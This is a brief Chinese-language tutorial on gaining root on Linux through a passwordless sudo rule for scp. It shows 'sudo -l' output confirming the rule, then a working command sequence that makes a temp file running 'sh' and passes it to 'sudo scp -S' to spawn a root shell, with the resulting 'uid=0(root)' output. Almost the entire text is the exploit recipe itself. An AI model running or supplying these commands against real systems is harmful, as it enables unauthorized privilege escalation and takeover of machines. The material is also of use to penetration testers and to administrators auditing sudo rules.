当scp命令有免密sudo的权限时,可以用来进行提权到其他账号
1、确认scp有sudo免密权限
test@test:~$ sudo -l sudo -l Matching Defaults entries for test on test: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hacksudo may run the following commands on test: (root) NOPASSWD: /usr/bin/scp
2、输入下列命令,即可完成提权
$ TF=$(mktemp) $ echo 'sh 0<&2 1>&2' > $TF $ chmod +x "$TF" $ sudo scp -S $TF x y: id uid=0(root) gid=0(root) groups=0(root)